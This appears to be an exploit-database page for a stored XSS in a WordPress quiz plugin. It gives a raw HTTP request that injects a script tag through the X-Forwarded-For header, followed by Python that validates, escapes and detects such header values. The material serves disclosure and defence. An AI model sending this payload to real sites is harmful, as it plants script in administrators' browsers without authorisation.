## https://sploitus.com/exploit?id=WPEX-ID:44BCE76B-E3A8-4AFC-AB0E-6D82372BA7CD
```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------7120129551144157309683473226
Content-Length: 1376
X-FORWARDED-FOR: <script>alert(/XSS/)</script>
Connection: close

-----------------------------7120129551144157309683473226
Content-Disposition: form-data; name="qsm_hidden_questions"


-----------------------------7120129551144157309683473226
Content-Disposition: form-data; name="question3"

bb
-----------------------------7120129551144157309683473226
Content-Disposition: form-data; name="question4"

aa
-----------------------------7120129551144157309683473226
Content-Disposition: form-data; name="qmn_question_list"

3Q4Q
-----------------------------7120129551144157309683473226
Content-Disposition: form-data; name="total_questions"

2
-----------------------------7120129551144157309683473226
Content-Disposition: form-data; name="timer"

13
-----------------------------7120129551144157309683473226
Content-Disposition: form-data; name="timer_ms"

13673
-----------------------------7120129551144157309683473226
Content-Disposition: form-data; name="qmn_quiz_id"

2
-----------------------------7120129551144157309683473226
Content-Disposition: form-data; name="complete_quiz"

confirmation
-----------------------------7120129551144157309683473226
Content-Disposition: form-data; name="current_page"

0
-----------------------------7120129551144157309683473226
Content-Disposition: form-data; name="action"

qmn_process_quiz
-----------------------------7120129551144157309683473226--
```


The XSS fires when the stored quiz results are viewed at `/wp-admin/admin.php?page=mlw_quiz_results&quiz_id=2`.
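The request above works because a value that should only ever be an IP address is taken from a client-controlled header, kept with the quiz submission, and later echoed into the admin results page. As an added example (not code from the advisory or from the plugin), the Python below shows the two defensive layers a handler for this header needs, validation before storage and escaping at output, plus a small check that flags such header values in proxy logs. It assumes the plugin records the first hop of `X-Forwarded-For` as the submitter's IP and prints it on the results page; the function names and the log line format are constructed for this illustration.

```python
"""Defensive handling of X-Forwarded-For for a stored-result page.

Added example, not the plugin's code. Assumed flow: the handler records the
client IP taken from X-Forwarded-For with each quiz submission, and the admin
results page later renders that stored string.
"""
import html
import ipaddress


def is_ip(text):
    """True if text parses as a valid IPv4 or IPv6 address."""
    try:
        ipaddress.ip_address(text.strip())
        return True
    except ValueError:
        return False


def client_ip_from_xff(header_value, remote_addr):
    """Layer 1, validation at input: return a string that is safe to store.

    Only a syntactically valid IP (the first hop of the XFF list) is accepted;
    anything else falls back to the socket peer address, so the markup in the
    PoC header never reaches the database.
    """
    if header_value:
        first_hop = header_value.split(",")[0].strip()
        if is_ip(first_hop):
            return str(ipaddress.ip_address(first_hop))
    return remote_addr


def render_result_row(stored_ip):
    """Layer 2, escaping at output: one table cell of the results page.

    Independent of validation, so a value that reached storage by another
    route (older rows, a bug elsewhere) still renders as inert text.
    """
    return "<td>{}</td>".format(html.escape(stored_ip, quote=True))


# Constructed sample log lines (not real traffic), in an assumed format:
#   remote_addr "x-forwarded-for" "request line"
CONSTRUCTED_LOG_LINES = [
    '203.0.113.5 "198.51.100.7" "POST /wp-admin/admin-ajax.php"',
    '203.0.113.5 "<script>alert(/XSS/)</script>" "POST /wp-admin/admin-ajax.php"',
    '203.0.113.9 "-" "GET /index.php"',
    '203.0.113.9 "198.51.100.7, 10.0.0.1" "POST /wp-admin/admin-ajax.php"',
]


def suspicious_xff_lines(lines):
    """Detection: flag lines whose XFF value is not a comma-separated IP list.

    A legitimate X-Forwarded-For is only ever IP addresses (or "-" when the
    header is absent), so any other content is worth alerting on.
    """
    flagged = []
    for line in lines:
        parts = line.split('"')
        if len(parts) < 2:
            continue  # malformed line for the assumed format, skip it
        xff = parts[1]
        if xff == "-":
            continue
        hops = [hop.strip() for hop in xff.split(",")]
        if not all(is_ip(hop) for hop in hops):
            flagged.append(line)
    return flagged


if __name__ == "__main__":
    poc = "<script>alert(/XSS/)</script>"
    print("stored:", client_ip_from_xff(poc, "203.0.113.5"))
    print("rendered:", render_result_row(poc))
    for line in suspicious_xff_lines(CONSTRUCTED_LOG_LINES):
        print("flagged:", line)
```

Validation alone would have stopped this PoC, but output escaping is what protects the results page against every other path by which a non-IP string might reach that column, which is why both belong in the fix rather than either one on its own.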